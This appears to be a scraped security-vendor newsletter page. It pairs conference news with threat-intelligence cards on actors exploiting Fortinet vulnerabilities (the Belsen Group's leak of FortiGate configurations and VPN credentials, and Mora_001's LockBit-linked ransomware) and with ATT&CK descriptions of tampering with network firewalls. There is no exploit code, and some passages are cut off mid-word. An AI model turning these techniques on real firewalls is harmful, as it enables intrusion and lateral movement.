blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Threat Intel
Belsen Group
threat_intel·CVSS 9.8
CVE-2022-40684 [CRITICAL] Belsen Group
# Threat Actor: Belsen Group
## Description
The Belsen Group has exploited the CVE-2022-40684 vulnerability in Fortinet devices to compromise over 15,000 FortiGate firewalls, releasing detailed configurations and plaintext VPN credentials. Their leaked data, organized by country and IP address, primarily consists of configurations from FortiOS 7.0.6 and 7.2.1, which were the last vulnerable versions before patches were issued. Security researcher Kevin Beaumont confirmed that the group leveraged this vulnerability to gain unauthorized access and warned of potential exploitation of CVE-2024-55591 by similar threat actors. Fortinet has stated that the leaked data originates from older campaigns and not from any recent incidents.
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Threat Intel
Mora_001
threat_intel·CVSS 9.8
CVE-2024-55591 [CRITICAL] Mora_001
# Threat Actor: Mora_001
## Description
Mora_001 is a threat actor exhibiting a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472 vulnerabilities affecting Fortinet devices. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or shared communication channels. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.
ATT&CK
Network Device Firewall
mitre_attack·CVSS 9.8
CVE-2024-55591 [CRITICAL] Network Device Firewall
Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.
Adversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.
Adversaries may obtain access to network device management interfaces via [Valid Accounts](https://attac
ATT&CK
Disable or Modify Network Device Firewall
mitre_attack·CVSS 9.8
[CRITICAL] Disable or Modify Network Device Firewall
Disable or Modify Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.
Modifying or disabling a network firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions.(Citation: Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware)
Adversaries may gain access to the firewall management console via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting a vulnerability. In some cases, threat actors may target firewall
2025-01-14
Published
2025-01-14
Added to CISA KEV
Exploited in the wild